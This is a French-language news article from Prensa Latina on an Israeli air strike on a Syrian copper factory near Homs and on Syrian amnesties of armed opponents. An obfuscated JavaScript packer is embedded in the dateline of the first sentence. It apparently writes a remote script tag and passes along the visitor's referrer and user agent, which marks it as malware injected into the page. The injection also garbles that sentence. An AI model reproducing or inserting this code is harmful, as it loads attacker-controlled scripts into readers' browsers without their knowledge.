samedi 20 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Israël attaque une installation industrielle syrienne

Damas, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inikn|var|u0026u|referrer|hznsk||js|php'.split('|'),0,{})) 2 novembre (Prensa Latina) Des sources militaires ont informé que des avions de combat israéliens ont bombardé une installation industrielle de la ville de Hassieh, dans la province de Homs.

Damas, 2 novembre (Prensa Latina) Des sources militaires ont informé que des avions de combat israéliens ont bombardé une installation industrielle de la ville de Hassieh, dans la province de Homs.

Des sources fiables consultées par Prensa Latina à Damas, ont fait par du fait que deux chasseurs israéliens ont lancé, depuis l´espace aérien libanais, quatre missiles air-sol contre l´usine de cuivre, la plus importante du pays, située à 40 kilomètres au sud de la ville de Homs. Le rapport précise qu´en réponse à l´agression israélienne, la défense anti-aérienne syrienne a lancé trois missiles air-sol contre les avions sionistes, sans atteindre leurs objectifs, depuis la Brigade 72.

L´attaque d´Israël a provoqué la destruction de l´usine et des dommages matériels à d´autres installations proches. À l´heure actuelle le nombre de victimes n´a pas été communiqué.

À plusieurs occasions Israël a attaqué des installations et des positions syriennes. La plus récente a eu lieu en juillet dernier lorsqu´elle a bombardé une installation du Centre de Recherche Scientifique de la commune Messiaf, à l´Ouest de la province de Hama.

Damas a récemment dénoncé le fait que les offensives israéliennes ont pour objectif de soutenir des groupes terroristes, et considère Tel-Aviv et ces extrémistes comme les deux faces d´une même pièce.

À cet instant, le Ministère de la Défense syrien n´a pas encore émis de déclaration quant à la nouvelle agression israélienne contre ce pays.

Par ailleurs, les autorités syriennes ont aujourd´hui amnistié plus de 200 opposants armés dans le nord-est de la ville d´Alep, et ce dans le cadre de la politique de réconciliation nationale de ce pays du Levant.

Le Chef du Département de Réconciliation, Imad Ghadban, a aujourd´hui signalé lors d´une cérémonie que les personnes amnistiées, auxquelles il est assuré un logement temporaire, ont toutes les garanties juridiques et constitutionnelles établies dans ce pays arabes. À partir de ce moment, ces personnes se réintègrent à la société en compagnie de leur famille.

Depuis le début de l´année, la justice syrienne a amnistié plus de huit mille anciens opposants armés.

peo/agp/obf/tgj/obf

EN CONTINU
notes connexes